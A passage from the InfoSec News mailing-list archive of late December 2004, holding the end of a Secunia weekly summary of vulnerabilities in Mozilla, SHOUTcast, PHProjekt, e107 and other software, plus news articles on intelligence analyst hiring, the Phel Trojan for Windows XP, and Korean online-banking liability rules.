Full Advisory: http://secunia.com/advisories/13671/ Cross Platform:-- [SA13687] Mozilla "MSG_UnEscapeSearchUrl()" Buffer Overflow Vulnerability Critical: Highly critical Where: From remote Impact: System access, DoS Released: 2004-12-30 Maurycy Prodeus has reported a vulnerability in Mozilla, which potentially can be exploited by malicious people to compromise a user's system. Full Advisory: http://secunia.com/advisories/13687/ -- [SA13673] WHM AutoPilot Multiple Vulnerabilities Critical: Highly critical Where: From remote Impact: Cross Site Scripting, Exposure of system information, System access Released: 2004-12-29 James Bercegay has reported some vulnerabilities in WHM AutoPilot, which can be exploited by malicious people to conduct cross-site scripting, compromise a vulnerable system and disclose system information. Full Advisory: http://secunia.com/advisories/13673/ -- [SA13661] SHOUTcast Filename Format String Vulnerability Critical: Highly critical Where: From remote Impact: System access Released: 2004-12-26 Tomasz Trojanowski and Damian Put have discovered a vulnerability in SHOUTcast, which potentially can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/13661/ -- [SA13660] PHProjekt "path_pre" Parameter Arbitrary File Inclusion Vulnerability Critical: Highly critical Where: From remote Impact: System access Released: 2004-12-28 cYon has reported a vulnerability in PHProjekt, which can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/13660/ -- [SA13657] e107 Image Manager File Upload Vulnerability Critical: Highly critical Where: From remote Impact: System access Released: 2004-12-26 sysbug has reported a vulnerability in e107, which can be exploited by malicious people to compromise a vulnerable system. 
Full Advisory: http://secunia.com/advisories/13657/ -- [SA13652] Help Center Live Multiple Vulnerabilities Critical: Highly critical Where: From remote Impact: Cross Site Scripting, Exposure of sensitive information, System access Released: 2004-12-26 James Bercegay has reported some vulnerabilities in Help Center Live, which can be exploited by malicious people to conduct cross-site scripting attacks, compromise a vulnerable system and disclose sensitive information. Full Advisory: http://secunia.com/advisories/13652/ -- [SA13649] Zeroboard Two Vulnerabilities Critical: Highly critical Where: From remote Impact: Cross Site Scripting, System access Released: 2004-12-24 Jeremy Bae has reported two vulnerabilities in Zeroboard, which can be exploited by malicious people to compromise a vulnerable system and conduct cross-site scripting attacks. Full Advisory: http://secunia.com/advisories/13649/ -- [SA13677] MySQL Eventum Multiple Vulnerabilities Critical: Moderately critical Where: From remote Impact: Security Bypass, Cross Site Scripting Released: 2004-12-30 sullo has reported multiple vulnerabilities in Eventum, which can be exploited by malicious people to conduct cross-site scripting and script insertion attacks and potentially bypass certain security restrictions. Full Advisory: http://secunia.com/advisories/13677/ -- [SA13665] PHP-Blogger Disclosure of Sensitive Information Security Issue Critical: Moderately critical Where: From remote Impact: Exposure of sensitive information Released: 2004-12-24 snilabs has reported a security issue in PHP-Blogger, which can be exploited by malicious people to disclose sensitive information. 
Full Advisory: http://secunia.com/advisories/13665/ -- [SA13694] Moodle "search" Cross-Site Scripting Vulnerability Critical: Less critical Where: From remote Impact: Cross Site Scripting Released: 2004-12-30 Bartek Nowotarski has reported a vulnerability in Moodle, which can be exploited by malicious people to conduct cross-site scripting attacks. Full Advisory: http://secunia.com/advisories/13694/ ======================================================================== Secunia recommends that you verify all advisories you receive, by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Subscribe: http://secunia.com/secunia_weekly_summary/ Contact details: Web : http://secunia.com/ E-mail : support@secunia.com Tel : +45 70 20 51 44 Fax : +45 70 20 51 45 ======================================================================== From isn at c4i.org Fri Dec 31 05:29:50 2004 From: isn at c4i.org (InfoSec News) Date: Fri Dec 31 05:44:25 2004 Subject: [ISN] Analysts Are in Great Demand Message-ID: http://www.washingtonpost.com/wp-dyn/articles/A35070-2004Dec29.html By Katherine Pfleger Shrader Associated Press December 30, 2004 Counterterrorism agencies are shopping for talent at job fairs, dangling generous scholarships and luring staff from each other in a race to overcome a shortage of analysts that may only get worse in the new intelligence reorganization. The problem existed even before Congress and the White House approved an intelligence restructuring this month that has created positions for people whose skills are already in high demand. There is no consensus among the nation's 15 intelligence agencies on where staffing needs are the most acute. But few dispute that many more analysts are needed, particularly in the departments and agencies created since Sept. 
11, 2001. The nearly two-year-old Department of Homeland Security is a prime example.

"If you had a hundred, we'd take them," retired Army Lt. Gen. Patrick M. Hughes, the agency's top intelligence official, said in an interview earlier this year. "We have to look, search, test, assess. . . . We need people, but we need good people."

To find them, Homeland Security and other agencies are heading to job fairs, often looking near military bases where civil service is part of the culture and people may have security clearances. They are also trying to snag people from the private sector.

Congress is also offering sweeteners. Senate Select Committee on Intelligence Chairman Pat Roberts (R-Kan.) created the intelligence community's answer to the GI Bill and other military scholarships. Under the program, undergraduate and graduate students can receive as much as $50,000 for two years of tuition if they agree to take needed jobs in an intelligence agency for as long as three years. This year, slots for 150 students were divided among the agencies, using $4 million from Congress. About $6 million will be available next year.

Being an analyst is almost an academic profession -- part taught, part absorbed, part intuition -- that requires weighing volumes of information and boiling them down into reports for policymakers in the executive branch and in Congress.

Among the most classified and most important reports are national intelligence estimates, which draw on information from across government and are written by top analysts at the National Intelligence Council. It was the council that produced the October 2002 estimate on the threat posed by Iraq, with its overblown assessment of weapons stockpiles.

Statistics on precisely how many analysts are needed are hard to come by. Almost universally, agencies say such numbers are classified.

President Bush ordered the CIA in November to double the number of analysts it employs. The agency would not say how many new jobs that directive opened up.

Beginning several years ago, the National Geospatial-Intelligence Agency, which studies imagery from spy satellites and other systems, started hiring about 900 analysts, spokesman Dave Burpee said. Most will join the agency between next year and 2009.

In addition, the Defense Intelligence Agency plans to hire 1,000 mid-level to senior civilians next year, mostly analysts, in jobs with starting salaries between $53,000 and $74,000.

And the National Security Agency, the nation's code breaker and code protector, hopes to hire more than 6,000 people by 2009, on top of the 1,300 hired by the end of September. The secretive agency would not say how many will be analysts.

DIA spokesman Donald Black said there has been more competition to hire analysts since the Sept. 11, 2001, attacks, especially people who speak languages such as Arabic that are needed at the CIA, the FBI and elsewhere. Security clearances narrow the field even more.

"You don't have a limitless pool to draw from," Black said.

Agencies also hire away analysts from each other.

"Sure, there is intense competition within the government," said Homeland Security spokeswoman Michelle Petrovich. "The pool that we are looking for is probably going to be fairly limited and in high demand."

During a series of hearings into the bombings of the USS Cole, the U.S. embassies in Africa and other attacks, Roberts concluded that the shortage of experienced analysts was the intelligence community's most glaring deficiency.

Before the 1998 attack on the Navy destroyer Cole in a Yemeni port, one intelligence analyst had found information that led him to conclude that such an attack was possible. But the warnings were not heeded, Roberts said.

Most specialties require analysts to invest seven to 10 years to get a true handle on their subject.
Cultures and languages can require extensive immersion in a region, which cannot be gained from sitting behind a desk in Washington.

Mike Scheuer, who headed the CIA's Osama bin Laden unit from 1996 to 1999, said the intelligence services need to find more experts on Islamic extremism, like the legions of analysts available during the Cold War to deal with the Soviets.

From isn at c4i.org Fri Dec 31 05:30:12 2004
From: isn at c4i.org (InfoSec News)
Date: Fri Dec 31 05:44:28 2004
Subject: [ISN] Windows XP users Phelled by new Trojan
Message-ID:

http://www.theregister.co.uk/2004/12/30/ms_phel_vuln/

By Ashlee Vance in Chicago
30th December 2004

A new Trojan horse - named Phel - that punishes users of Microsoft Windows XP operating system is in the wild.

Security software firm Symantec has issued a bulletin warning Windows XP users to be on the lookout for the program, which is distributed as an .html file. The malicious code can attack systems running XP Service Pack 2.

The vuln was first found in October, and Microsoft is busy trying to catch up to it.

"Microsoft is taking this vulnerability very seriously, and an update to correct the vulnerability is currently in development," the company told ComputerWorld. "We will release the security update when the development and testing process is complete, and the update is found to effectively correct the vulnerability."

Symantec warns that users will see two Internet Explorer windows pop up when an .html file with Trojan.Phel.A is opened. If the code does its worst, the Trojan will automatically be executed every time a Windows user turns on his machine.

More information from Symantec is available here [1].
[1] http://securityresponse.symantec.com/avcenter/venc/data/trojan.phel.a.html#threatassessment

From isn at c4i.org Fri Dec 31 05:30:34 2004
From: isn at c4i.org (InfoSec News)
Date: Fri Dec 31 05:44:30 2004
Subject: [ISN] Online Banks Will Be Liable for 'Hacking' Damages in 2006
Message-ID:

http://english.chosun.com/w21data/html/news/200412/200412300030.html

Park Jong-se
Dec. 30, 2004

Starting from 2006, financial institutions will be held responsible for any damage consumers may suffer at the hands of hackers or from malfunctioning computer systems while engaging in financial transactions on the Internet.

The government adopted a financial e-transaction bill during a vice ministerial meeting Thursday. The bill will be discussed at a Cabinet meeting scheduled for Jan. 4 before being submitted to the National Assembly.

According to the bill, if consumers incur damages or loss while engaging in e-banking because of an incident caused by a third factor, such as a case of hacking or computer system meltdowns, financial institutions or e-banking service providers will be liable.

An exception that grants financial institutions immunity is also included in the bill. If consumers cause a problem deliberately or by their own mistakes, they will be held accountable.

The bill states that consumers' identification number, secret code and certified document, all of which are essential prerequisites for e-banking, should be issued only when consumers apply for them and after their identity has been confirmed. It also mandates that transaction records should be kept.